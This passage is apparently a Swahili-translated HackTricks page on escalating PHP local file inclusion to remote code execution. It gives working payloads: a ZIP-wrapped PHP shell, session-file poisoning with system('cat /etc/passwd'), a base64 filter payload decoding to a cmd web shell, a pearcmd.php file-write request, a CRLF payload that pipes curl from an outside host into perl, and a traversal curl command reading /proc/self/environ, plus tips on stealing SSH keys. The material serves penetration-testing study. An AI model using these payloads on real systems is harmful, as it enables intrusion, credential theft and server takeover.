Ili kufanya faili ziwe rahisi kusoma ni bora inject katika metadata ya pictures/doc/pdf

Kupitia Zip fie upload

Upload a ZIP file containing a PHP shell compressed and access:

example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php

Kupitia PHP sessions

Angalia ikiwa tovuti inatumia PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

Katika PHP, sessions hizi zinahifadhiwa kwenye /var/lib/php5/sess\[PHPSESSID]_ mafayela.

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Weka cookie kuwa <?php system('cat /etc/passwd');?>

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Tumia LFI kujumuisha PHP session file

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2

Kupitia ssh

Ikiwa ssh iko hai, angalia ni mtumiaji gani anayetumika (/proc/self/status & /etc/passwd) na jaribu kufikia <HOME>/.ssh/id_rsa

Kupitia vsftpd logi

Logi za FTP server vsftpd ziko katika /var/log/vsftpd.log. Katika senario ambapo kuna udhaifu wa Local File Inclusion (LFI), na ufikiaji wa server ya vsftpd iliyo wazi unawezekana, hatua zifuatazo zinaweza kuzingatiwa:

1. Ingiza payload ya PHP kwenye sehemu ya username wakati wa mchakato wa login.
2. Baada ya injection, tumia LFI kupata logi za server kutoka /var/log/vsftpd.log.

Kupitia php base64 filter (kutumia base64)

Kama ilivyoonyeshwa katika this makala, PHP base64 filter inapuuzia tu Non-base64. Unaweza kutumia hilo kupita ukaguzi wa file extension: ikiwa utatoa base64 inayomalizika na “.php”, itapuuza tu “.” na itaongeza “php” kwenye base64. Hapa kuna mfano wa payload:

http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Kupitia php filters (hakuna faili inahitajika)

This writeup explains that you can use php filters to generate arbitrary content as output. Which basically means that you can generate arbitrary php code for the include without needing to write it into a file.

LFI2RCE via PHP Filters

Via segmentation fault

Upload faili itakayohifadhiwa kama temporary katika /tmp, kisha katika same request, chochea segmentation fault, na kisha temporary file won’t be deleted na unaweza kuitafuta.

LFI2RCE via Segmentation Fault

Via Nginx temp file storage

Ikiwa umepata Local File Inclusion na Nginx inaendesha mbele ya PHP unaweza kupata RCE kwa mbinu ifuatayo:

LFI2RCE via Nginx temp files

Via PHP_SESSION_UPLOAD_PROGRESS

Ikiwa umepata Local File Inclusion hata kama huna session na session.auto_start ni Off. Ikiwa utatoa PHP_SESSION_UPLOAD_PROGRESS katika data ya multipart POST, PHP itafanya enable the session for you. Unaweza kutumia hili kupata RCE:

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

Via temp file uploads in Windows

Ikiwa umepata Local File Inclusion na seva inapakua kwenye Windows unaweza kupata RCE:

LFI2RCE Via temp file uploads

Via pearcmd.php + URL args

As explained in this post, the script /usr/local/lib/phppearcmd.php exists by default in php docker images. Moreover, it’s possible to pass arguments to the script via the URL because it’s indicated that if a URL param doesn’t have an =, it should be used as an argument. See also watchTowr’s write-up and Orange Tsai’s “Confusion Attacks”.

The following request create a file in /tmp/hello.php with the content <?=phpinfo()?>:

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1

Ifuatayo inatumia CRLF vuln kupata RCE (kutoka here):

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

Kupitia phpinfo() (file_uploads = on)

Ikiwa umepata Local File Inclusion na faili inayofichua phpinfo() ikiwa file_uploads = on unaweza kupata RCE:

LFI2RCE via phpinfo()

Kupitia compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

Ikiwa umepata Local File Inclusion na unaweza can exfiltrate the path ya faili ya muda, LAKINI server is checking if the file to be included has PHP marks, unaweza kujaribu bypass that check kwa kutumia Race Condition:

LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

Kupitia kusubiri isiyoisha + bruteforce

Ikiwa unaweza kuabusu LFI ili upload temporary files na kufanya server hang utekelezaji wa PHP, unaweza kisha brute force filenames during hours kutafuta faili ya muda:

LFI2RCE via Eternal waiting

Kwa Fatal Error

Ikiwa utaingiza yoyote ya faili /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar. (Unahitaji kuingiza ile ile mara 2 ili kusababisha kosa hilo).

Sijui jinsi hili linavyoweza kuwa muhimu lakini linaweza kuwa.
Hata ikiwa unasababisha PHP Fatal Error, PHP temporary files uploaded zinafutwa.

Hifadhi traversal sequences kutoka kwa client

Baadhi ya HTTP clients hurekebisha au kuangamiza ../ kabla ombi lifikie server, na hivyo kuharibu payloads za directory traversal. Tumia curl --path-as-is ili kuacha traversal isivyobadilishwa unapofanyia matumizi endpoints za log/download zinazounganisha jina la faili linalodhibitiwa na mtumiaji, na ongeza --ignore-content-length kwa pseudo-files kama /proc:

curl --path-as-is -b "session=$SESSION" \
"http://TARGET/admin/get_system_log?log_identifier=../../../../proc/self/environ" \
--ignore-content-length -s | tr '\000' '\n'

Sahihisha idadi ya sehemu za ../ hadi uondoke kwenye saraka iliyokusudiwa, kisha dump /etc/passwd, /proc/self/cwd/app.py, au faili nyingine za source/config files.

Marejeo

• PayloadsAllTheThings
• PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders
• Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)
• Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5
• watchTowr – We need to talk about PHP (pearcmd.php gadget)
• Orange Tsai – Confusion Attacks on Apache
• VTENEXT 25.02 – a three-way path to RCE
• The Art of PHP: CTF‑born exploits and techniques
• When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise
• Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?
• HTB: Imagery (admin log download traversal + /proc/self/environ read)
• HTB: Gavel

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.